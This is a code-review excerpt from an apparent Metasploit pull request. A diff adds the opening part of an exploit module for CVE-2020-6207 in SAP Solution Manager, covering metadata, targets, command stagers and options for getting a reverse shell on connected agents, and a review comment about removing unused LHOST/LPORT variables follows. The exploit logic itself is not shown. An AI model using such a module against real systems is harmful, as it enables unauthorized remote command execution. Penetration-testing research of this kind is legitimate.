modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb

```diff
@@ -0,0 +1,156 @@
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::SapSolManEemMissAuth
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
+            'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability
+            'Dmitry Chastuhin', # @chipik The researcher who made first PoC
+            'Vladimir Ivanov' # @_generic_human_ This Metasploit module
+          ],
+        'Description' => %q{
+          This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of
+          SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
+          checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
+          send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.
+
+          Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan
+          agent as the user under which it runs SMDAgent service, usually daaadm.
+        },
+        'References' =>
+          [
+            ['CVE', '2020-6207'],
+            ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
+            ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
+          ],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Linux',
+            {
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => ['printf', 'echo', 'bourne']
+            }
+          ],
+          [
+            'Windows',
+            {
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Platform' => 'win',
+              'CmdStagerFlavor' => ['certutil', 'vbs', 'debug_write', 'debug_asm']
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2020-10-03'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(50000),
+        OptString.new('TARGETURI', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),
+        OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']),
+      ]
+    )
+  end
+
+  def setup_variables
+    @host = datastore['RHOSTS']
+    @port = datastore['RPORT']
+    @lhost = datastore['LHOST'] || '0.0.0.0'
+    @lport = datastore['LPORT'] || 4444
```

Comment:
It doesn't look like these are necessary anymore since you're using a payload provided by Metasploit.

Reply:
Removed var lhost, lport in exploit module: https://github.com/rapid7/metasploit-framework/pull/14924/commits/391e013d89974a0aef3048040912a7fe43f67ef4